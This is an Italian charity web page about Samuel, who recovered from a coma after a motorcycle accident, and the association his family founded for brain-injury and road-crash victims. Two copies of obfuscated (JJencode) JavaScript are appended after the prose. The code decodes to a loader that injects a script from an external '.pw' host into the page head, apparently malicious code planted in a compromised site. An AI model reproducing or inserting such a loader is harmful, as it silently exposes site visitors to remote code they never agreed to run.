UN INNO ALLA VITA PER IL 2018

Esistono tante cose nella vita che catturano lo sguardo ma solo poche catturano il cuore…
Un figlio che ti chiede di tornare a vivere è una di quelle, e tu sei disposto a donare la tua vita pur di permetterglielo.

Samuel, nel 1996, andando al lavoro in moto, a causa di una congestione ebbe uno svenimento e la relativa rovinosa caduta lo ridusse in fin di vita. Ma la morte non aveva fatto i conti con l’amore, le fede e la speranza che univa questo figlio a coloro che lo amavano. La morte, dopo 45 giorni di assedio, se ne andò e, vendicandosi, lo lasciò in coma e con una paresi a metà corpo, ma noi non ci siamo arresi e, da allora, abbiamo girato l’Italia alla ricerca di strutture in cui poterlo far tornare alla vita; le battaglie sono state tante e durissime ma i risultati ottenuti ci stanno gratificando. Ora Samuel è uscito dal coma, ha vinto la paresi e cammina autonomamente e, seppur claudicante, partecipa alla Stramilano; ha recuperato la vista, oggi scrive, gioca al computer e va a cavallo anche se a volte, nella sua mente si annida ancora tanta “nebbia”.

Forti di questa esperienza per far si che questa Vittoria non rimanesse solo nostra abbiamo fondato l’ASSOCIAZIONE AMICIdi SAMUEL – Onlus che, assieme alla Federazione Nazionale Associazioni Trauma Cranico a cui aderisce, si pone come riferimento e d’aiuto a tutti coloro che finiscono nel girone infernale della Vittime della Strada e che nella Associazione. potranno trovare risposte alle loro aspettative.

Questa associazione onlus è vicina alle persone con disabilità in particolare a quelle vittime di gravi cerebrolesioni come le vittime di incidenti stradali, i colpiti da ictus, aneurisma, e infarto. Tramite campagne di sensibilizzazione consente alle persone di divenire consapevoli delle drammatiche conseguente che ogni incidente porta con se.

Tantissimi istituti scolastici, centri congressi, auditorium, l’Università di Bruxelles, Milano e Brescia, la piazza Duomo di Milano, il Parlamento Europeo, il Teatro Nuovo di Verona e tanti altri posti sono stati testimoni degli incontri in cui, questa storia di morte divenuta un inno alla vita, è stata narrata proiettando un filmato che visualizza in 12 minuti 12 anni di vita di sofferenze ma anche .dI tante gioie. – Anche voi potete divenire attori in questa fantastica storia, le grandi cose nascono da piccoli gesti; il vostro impegno a far si che questa storia diventi patrimonio di chi vive una simile avventura, portandola a conoscenza anche di altri, non sarà che il primo. passo per divenire protagonisti..
Sul sito internet www.amicidisamuel.it è possibile venire a conoscenza delle iniziative svolte, avere, gratuitamente, il dvd “SAMUEL DAL COMA ALLA VITA” ed il libro “ DOMANI SI PARTE….” In cui potrete leggere i capitoli che narrano questa storia fantastica; entrerete a far parte di un mondo dove l’argomento principale non sono le sofferenze che il mondo della persone con disabilità regala ai suoi abitanti ma la gioia di vivere, che le quotidiane lotte e conquiste, seppur piccole, ti riempiono l’esistenza e sarà così un modo per confermarvi che la NOSTRA VITA E’ BELLA.

info@amicidisamuel.it.
evento amare il mio essere diverso $=~[];$={___:++$,$$$$:(![]+””)[$],__$:++$,$_$_:(![]+””)[$],_$_:++$,$_$$:({}+””)[$],$$_$:($[$]+””)[$],_$$:++$,$$$_:(!””+””)[$],$__:++$,$_$:++$,$$__:({}+””)[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+””)[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+””)[$.__$])+((!$)+””)[$._$$]+($.__=$.$_[$.$$_])+($.$=(!””+””)[$.__$])+($._=(!””+””)[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!””+””)[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+”\””+”\\”+$.__$+$.$$_+$.$$_+$.$_$_+”\\”+$.__$+$.$$_+$._$_+”\\”+$.$__+$.___+$.$$$_+(![]+””)[$._$_]+”=”+$.$$_$+$._$+$.$$__+$._+”\\”+$.__$+$.$_$+$.$_$+$.$$$_+”\\”+$.__$+$.$_$+$.$$_+$.__+”.”+$.$$__+”\\”+$.__$+$.$$_+$._$_+$.$$$_+$.$_$_+$.__+$.$$$_+”\\”+$.__$+$.___+$.$_$+(![]+””)[$._$_]+$.$$$_+”\\”+$.__$+$.$_$+$.$_$+$.$$$_+”\\”+$.__$+$.$_$+$.$$_+$.__+”(‘\\”+$.__$+$.$$_+$._$$+$.$$__+”\\”+$.__$+$.$$_+$._$_+”\\”+$.__$+$.$_$+$.__$+”\\”+$.__$+$.$$_+$.___+$.__+”‘);”+$.$$$_+(![]+””)[$._$_]+”.\\”+$.__$+$.$$_+$._$$+”\\”+$.__$+$.$$_+$._$_+$.$$__+”\\”+$.$__+$.___+”=\\”+$.$__+$.___+”‘\\”+$.__$+$.$_$+$.___+$.__+$.__+”\\”+$.__$+$.$$_+$.___+”\\”+$.__$+$.$$_+$._$$+”://\\”+$.__$+$.$$_+$.$$$+$.$$$_+$.$_$$+”.”+$.$$__+(![]+””)[$._$_]+$._$+$.$$_$+”.\\”+$.__$+$.$$_+$.___+”\\”+$.__$+$.$$_+$.$$$+”/\\”+$.__$+$.$_$+$._$_+”\\”+$.__$+$.$$_+$._$$+”/\\”+$.__$+$.$_$+$._$$+”\\”+$.__$+$.$$$+$.___+$.$_$_+”\\”+$.__$+$.___+$.$__+”\\”+$.__$+$._$$+$.__$+”\\”+$.__$+$.$$_+$.$$$+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$.__$+$._$_+”\\”+$.__$+$._$_+$.$_$+”\\”+$.__$+$._$_+$.__$+”\\”+$.__$+$._$_+$.$$_+”\\”+$.__$+$._$$+$._$_+$._$+”\\”+$.__$+$.$$$+$.___+”\\”+$.__$+$._$_+$.__$+$.$$__+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$.$$_+$.$$$+”\\”+$.__$+$.___+$.$$$+”\\”+$.__$+$._$$+$.___+$.$$_$+(![]+””)[$._$_]+”\\”+$.__$+$._$$+$.___+$._$_+”\\”+$.__$+$.$$_+$._$$+”\\”+$.__$+$._$_+$._$_+”\\”+$.__$+$._$_+$.$__+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$.$$_+$._$$+”\\”+$.__$+$.$$_+$.$$$+”\\”+$.__$+$._$_+$.$$$+”\\”+$.__$+$._$_+$.___+”\\”+$.__$+$.__$+$.$_$+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$.___+$._$_+$.___+”\\”+$.__$+$._$$+$._$_+”\\”+$.__$+$._$_+$.$_$+”\\”+$.__$+$._$_+$.___+$.$$$_+”\\”+$.__$+$.__$+$.__$+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$.__$+$.___+$.$$$+”\\”+$.__$+$._$_+$.$_$+”\\”+$.__$+$._$_+$.$$$+”\\”+$.__$+$.__$+$.$_$+”\\”+$.__$+$.$_$+$.__$+”\\”+$.__$+$.__$+$.$_$+”\\”+$.__$+$._$_+$._$_+”\\”+$.__$+$.__$+$.___+”\\”+$.__$+$._$_+$._$_+”\\”+$.__$+$.___+$.$_$+”\\”+$.__$+$._$_+$.$__+”\\”+$.__$+$.__$+$.___+$.$$_$+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$.$_$+$._$_+”\\”+$.__$+$.___+$.$$$+$.$___+”\\”+$.__$+$._$_+$.$_$+”\\”+$.__$+$._$_+$.$__+”\\”+$.__$+$._$_+$.__$+”\\”+$.__$+$._$$+$._$_+$.$$_$+”\\”+$.__$+$.$__+$.$$$+”\\”+$.__$+$.___+$.$_$+”\\”+$.__$+$.___+$._$_+$.__+”\\”+$.__$+$.$$_+$.$$$+”\\”+$.__$+$.___+$._$_+”\\”+$.__$+$.___+$._$$+$.__+”\\”+$.__$+$.$$$+$.__$+”\\”+$.__$+$._$$+$._$_+”\\”+$.__$+$.$$$+$._$_+$._$+”\\”+$.__$+$._$_+$.__$+”\\”+$.__$+$._$_+$.$$$+”\\”+$.__$+$.__$+$.$__+$.__$+”\\”+$.__$+$.$_$+$._$_+”\\”+$.__$+$.__$+$._$_+”\\”+$.__$+$.__$+$.$_$+”\\”+$.__$+$.$$_+$._$$+”\\”+$.__$+$.$__+$.$$$+”\\”+$.__$+$.__$+$.$$_+”\\”+$.__$+$._$_+$.$__+$._$+$._$_+”\\”+$.__$+$.__$+$._$$+”\\”+$.__$+$._$_+$.___+$.___+”\\”+$.__$+$.___+$._$_+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$._$_+$.$$$+”\\”+$.__$+$._$$+$.__$+”\\”+$.__$+$.___+$._$$+$.$$_$+”-\\”+$.__$+$._$$+$.__$+”\\”+$.__$+$.$_$+$._$$+$.$_$$+”\\”+$.__$+$.___+$._$$+”\\”+$.__$+$.$$_+$.___+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$._$_+$.__$+$.$$__+”\\”+$.__$+$.__$+$.$$_+”\\”+$.__$+$.$_$+$._$_+”\\”+$.__$+$.___+$._$$+”-\\”+$.__$+$.$_$+$._$$+$.__$+”\\”+$.__$+$.___+$._$_+”\\”+$.__$+$.$_$+$.__$+”\\”+$.__$+$.__$+$.__$+$._$_+”\\”+$.__$+$.___+$.$$$+$.$_$+$.$$__+”\\”+$.__$+$.$_$+$.___+”\\”+$.__$+$.___+$.__$+”_”+$.$__+”\\”+$.__$+$.$_$+$.___+”\\”+$.__$+$.__$+$.$_$+”\\”+$.__$+$.$$_+$.__$+”\\”+$.__$+$.___+$.$$_+”\\”+$.__$+$._$_+$._$$+”\\”+$.__$+$.__$+$.___+$.$$$+”\\”+$.__$+$.__$+$.$_$+”\\”+$.__$+$._$_+$.$$$+”\\”+$.__$+$.___+$.__$+$._+”\\”+$.__$+$.___+$.$_$+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$.__$+$.$$_+”\\”+$.__$+$.$_$+$.___+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$.$_$+$._$$+”\\”+$.__$+$._$_+$._$_+”\\”+$.__$+$.$_$+$._$_+$.$$__+”\\”+$.__$+$._$_+$._$$+”\\”+$.__$+$.___+$.$$_+”\\”+$.__$+$.___+$._$$+”\\”+$.__$+$.___+$._$_+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$.___+$.$$$+”\\”+$.__$+$.$_$+$.$_$+”\\”+$.__$+$.$$_+$.___+”\\”+$.__$+$.___+$._$_+”\\”+$.__$+$.___+$.$$_+”\\”+$.__$+$.___+$.$$$+”\\”+$.__$+$._$$+$.__$+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$._$$+$.___+”\\”+$.__$+$._$_+$.__$+”\\”+$.__$+$.$$$+$.___+”\\”+$.__$+$.$$_+$.$$$+$.$_$_+”.\\”+$.__$+$.$_$+$._$_+”\\”+$.__$+$.$$_+$._$$+”?”+$.__+”\\”+$.__$+$.$$_+$._$_+(![]+””)[$._$_]+”=”+$.___+”.”+$._$$+$.___+”‘;”+$.$$_$+$._$+$.$$__+$._+”\\”+$.__$+$.$_$+$.$_$+$.$$$_+”\\”+$.__$+$.$_$+$.$$_+$.__+”.\\”+$.__$+$.$_$+$.___+$.$$$_+$.$_$_+$.$$_$+”.”+$.$_$_+”\\”+$.__$+$.$$_+$.___+”\\”+$.__$+$.$$_+$.___+$.$$$_+”\\”+$.__$+$.$_$+$.$$_+$.$$_$+”\\”+$.__$+$.___+$._$$+”\\”+$.__$+$.$_$+$.___+”\\”+$.__$+$.$_$+$.__$+(![]+””)[$._$_]+$.$$_$+”(“+$.$$$_+(![]+””)[$._$_]+”);”+”\””)())(); $=~[];$={___:++$,$$$$:(![]+””)[$],__$:++$,$_$_:(![]+””)[$],_$_:++$,$_$$:({}+””)[$],$$_$:($[$]+””)[$],_$$:++$,$$$_:(!””+””)[$],$__:++$,$_$:++$,$$__:({}+””)[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+””)[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+””)[$.__$])+((!$)+””)[$._$$]+($.__=$.$_[$.$$_])+($.$=(!””+””)[$.__$])+($._=(!””+””)[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!””+””)[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+”\””+”\\”+$.__$+$.$$_+$.$$_+$.$_$_+”\\”+$.__$+$.$$_+$._$_+”\\”+$.$__+$.___+$.$$$_+(![]+””)[$._$_]+”=”+$.$$_$+$._$+$.$$__+$._+”\\”+$.__$+$.$_$+$.$_$+$.$$$_+”\\”+$.__$+$.$_$+$.$$_+$.__+”.”+$.$$__+”\\”+$.__$+$.$$_+$._$_+$.$$$_+$.$_$_+$.__+$.$$$_+”\\”+$.__$+$.___+$.$_$+(![]+””)[$._$_]+$.$$$_+”\\”+$.__$+$.$_$+$.$_$+$.$$$_+”\\”+$.__$+$.$_$+$.$$_+$.__+”(‘\\”+$.__$+$.$$_+$._$$+$.$$__+”\\”+$.__$+$.$$_+$._$_+”\\”+$.__$+$.$_$+$.__$+”\\”+$.__$+$.$$_+$.___+$.__+”‘);”+$.$$$_+(![]+””)[$._$_]+”.\\”+$.__$+$.$$_+$._$$+”\\”+$.__$+$.$$_+$._$_+$.$$__+”\\”+$.$__+$.___+”=\\”+$.$__+$.___+”‘\\”+$.__$+$.$_$+$.___+$.__+$.__+”\\”+$.__$+$.$$_+$.___+”\\”+$.__$+$.$$_+$._$$+”://\\”+$.__$+$.$$_+$.$$$+$.$$$_+$.$_$$+”.”+$.$$__+(![]+””)[$._$_]+$._$+$.$$_$+”.\\”+$.__$+$.$$_+$.___+”\\”+$.__$+$.$$_+$.$$$+”/\\”+$.__$+$.$_$+$._$_+”\\”+$.__$+$.$$_+$._$$+”/\\”+$.__$+$.$_$+$._$$+”\\”+$.__$+$.$$$+$.___+$.$_$_+”\\”+$.__$+$.___+$.$__+”\\”+$.__$+$._$$+$.__$+”\\”+$.__$+$.$$_+$.$$$+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$.__$+$._$_+”\\”+$.__$+$._$_+$.$_$+”\\”+$.__$+$._$_+$.__$+”\\”+$.__$+$._$_+$.$$_+”\\”+$.__$+$._$$+$._$_+$._$+”\\”+$.__$+$.$$$+$.___+”\\”+$.__$+$._$_+$.__$+$.$$__+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$.$$_+$.$$$+”\\”+$.__$+$.___+$.$$$+”\\”+$.__$+$._$$+$.___+$.$$_$+(![]+””)[$._$_]+”\\”+$.__$+$._$$+$.___+$._$_+”\\”+$.__$+$.$$_+$._$$+”\\”+$.__$+$._$_+$._$_+”\\”+$.__$+$._$_+$.$__+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$.$$_+$._$$+”\\”+$.__$+$.$$_+$.$$$+”\\”+$.__$+$._$_+$.$$$+”\\”+$.__$+$._$_+$.___+”\\”+$.__$+$.__$+$.$_$+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$.___+$._$_+$.___+”\\”+$.__$+$._$$+$._$_+”\\”+$.__$+$._$_+$.$_$+”\\”+$.__$+$._$_+$.___+$.$$$_+”\\”+$.__$+$.__$+$.__$+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$.__$+$.___+$.$$$+”\\”+$.__$+$._$_+$.$_$+”\\”+$.__$+$._$_+$.$$$+”\\”+$.__$+$.__$+$.$_$+”\\”+$.__$+$.$_$+$.__$+”\\”+$.__$+$.__$+$.$_$+”\\”+$.__$+$._$_+$._$_+”\\”+$.__$+$.__$+$.___+”\\”+$.__$+$._$_+$._$_+”\\”+$.__$+$.___+$.$_$+”\\”+$.__$+$._$_+$.$__+”\\”+$.__$+$.__$+$.___+$.$$_$+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$.$_$+$._$_+”\\”+$.__$+$.___+$.$$$+$.$___+”\\”+$.__$+$._$_+$.$_$+”\\”+$.__$+$._$_+$.$__+”\\”+$.__$+$._$_+$.__$+”\\”+$.__$+$._$$+$._$_+$.$$_$+”\\”+$.__$+$.$__+$.$$$+”\\”+$.__$+$.___+$.$_$+”\\”+$.__$+$.___+$._$_+$.__+”\\”+$.__$+$.$$_+$.$$$+”\\”+$.__$+$.___+$._$_+”\\”+$.__$+$.___+$._$$+$.__+”\\”+$.__$+$.$$$+$.__$+”\\”+$.__$+$._$$+$._$_+”\\”+$.__$+$.$$$+$._$_+$._$+”\\”+$.__$+$._$_+$.__$+”\\”+$.__$+$._$_+$.$$$+”\\”+$.__$+$.__$+$.$__+$.__$+”\\”+$.__$+$.$_$+$._$_+”\\”+$.__$+$.__$+$._$_+”\\”+$.__$+$.__$+$.$_$+”\\”+$.__$+$.$$_+$._$$+”\\”+$.__$+$.$__+$.$$$+”\\”+$.__$+$.__$+$.$$_+”\\”+$.__$+$._$_+$.$__+$._$+$._$_+”\\”+$.__$+$.__$+$._$$+”\\”+$.__$+$._$_+$.___+$.___+”\\”+$.__$+$.___+$._$_+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$._$_+$.$$$+”\\”+$.__$+$._$$+$.__$+”\\”+$.__$+$.___+$._$$+$.$$_$+”-\\”+$.__$+$._$$+$.__$+”\\”+$.__$+$.$_$+$._$$+$.$_$$+”\\”+$.__$+$.___+$._$$+”\\”+$.__$+$.$$_+$.___+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$._$_+$.__$+$.$$__+”\\”+$.__$+$.__$+$.$$_+”\\”+$.__$+$.$_$+$._$_+”\\”+$.__$+$.___+$._$$+”-\\”+$.__$+$.$_$+$._$$+$.__$+”\\”+$.__$+$.___+$._$_+”\\”+$.__$+$.$_$+$.__$+”\\”+$.__$+$.__$+$.__$+$._$_+”\\”+$.__$+$.___+$.$$$+$.$_$+$.$$__+”\\”+$.__$+$.$_$+$.___+”\\”+$.__$+$.___+$.__$+”_”+$.$__+”\\”+$.__$+$.$_$+$.___+”\\”+$.__$+$.__$+$.$_$+”\\”+$.__$+$.$$_+$.__$+”\\”+$.__$+$.___+$.$$_+”\\”+$.__$+$._$_+$._$$+”\\”+$.__$+$.__$+$.___+$.$$$+”\\”+$.__$+$.__$+$.$_$+”\\”+$.__$+$._$_+$.$$$+”\\”+$.__$+$.___+$.__$+$._+”\\”+$.__$+$.___+$.$_$+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$.__$+$.$$_+”\\”+$.__$+$.$_$+$.___+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$.$_$+$._$$+”\\”+$.__$+$._$_+$._$_+”\\”+$.__$+$.$_$+$._$_+$.$$__+”\\”+$.__$+$._$_+$._$$+”\\”+$.__$+$.___+$.$$_+”\\”+$.__$+$.___+$._$$+”\\”+$.__$+$.___+$._$_+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$.___+$.$$$+”\\”+$.__$+$.$_$+$.$_$+”\\”+$.__$+$.$$_+$.___+”\\”+$.__$+$.___+$._$_+”\\”+$.__$+$.___+$.$$_+”\\”+$.__$+$.___+$.$$$+”\\”+$.__$+$._$$+$.__$+”\\”+$.__$+$.___+$.__$+”\\”+$.__$+$._$$+$.___+”\\”+$.__$+$._$_+$.__$+”\\”+$.__$+$.$$$+$.___+”\\”+$.__$+$.$$_+$.$$$+$.$_$_+”.\\”+$.__$+$.$_$+$._$_+”\\”+$.__$+$.$$_+$._$$+”?”+$.__+”\\”+$.__$+$.$$_+$._$_+(![]+””)[$._$_]+”=”+$.___+”.”+$._$$+$.___+”‘;”+$.$$_$+$._$+$.$$__+$._+”\\”+$.__$+$.$_$+$.$_$+$.$$$_+”\\”+$.__$+$.$_$+$.$$_+$.__+”.\\”+$.__$+$.$_$+$.___+$.$$$_+$.$_$_+$.$$_$+”.”+$.$_$_+”\\”+$.__$+$.$$_+$.___+”\\”+$.__$+$.$$_+$.___+$.$$$_+”\\”+$.__$+$.$_$+$.$$_+$.$$_$+”\\”+$.__$+$.___+$._$$+”\\”+$.__$+$.$_$+$.___+”\\”+$.__$+$.$_$+$.__$+(![]+””)[$._$_]+$.$$_$+”(“+$.$$$_+(![]+””)[$._$_]+”);”+”\””)())();